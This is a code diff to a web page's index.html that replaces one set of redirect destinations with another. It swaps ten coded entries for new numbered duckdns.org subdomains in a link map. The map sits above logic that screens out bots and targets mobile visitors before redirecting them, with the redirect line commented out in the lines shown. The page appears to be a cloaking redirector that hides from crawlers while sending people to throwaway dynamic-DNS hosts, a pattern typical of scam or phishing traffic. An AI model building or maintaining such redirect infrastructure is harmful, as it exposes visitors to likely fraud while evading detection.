--- a/index.html
+++ b/index.html
@@ -280,16 +280,16 @@
                 "ON08": "https://00197703497.duckdns.org",
                 "ON09": "https://00197703498.duckdns.org",
                 "ON10": "https://00197703499.duckdns.org",
-                "JY11": "https://78765557701.duckdns.org",
-                "JY12": "https://78765557702.duckdns.org",
-                "JY13": "https://78765557703.duckdns.org",
-                "JY14": "https://78765557704.duckdns.org",
-                "JY15": "https://78765557705.duckdns.org",
-                "JY16": "https://78765557706.duckdns.org",
-                "JY17": "https://78765557707.duckdns.org",
-                "JY18": "https://78765557708.duckdns.org",
-                "JY19": "https://78765557709.duckdns.org",
-                "JY20": "https://78765557710.duckdns.org",
+                "CON11": "https://5436743631.duckdns.org",
+                "CON12": "https://5436743632.duckdns.org",
+                "CON13": "https://5436743633.duckdns.org",
+                "CON14": "https://5436743634.duckdns.org",
+                "CON15": "https://5436743635.duckdns.org",
+                "CON16": "https://5436743636.duckdns.org",
+                "CON17": "https://5436743637.duckdns.org",
+                "CON18": "https://5436743638.duckdns.org",
+                "CON19": "https://5436743639.duckdns.org",
+                "CON20": "https://5436743640.duckdns.org",
             };
             if (!is_bot && is_MIbile) {
                 //window.location.href = links[code];
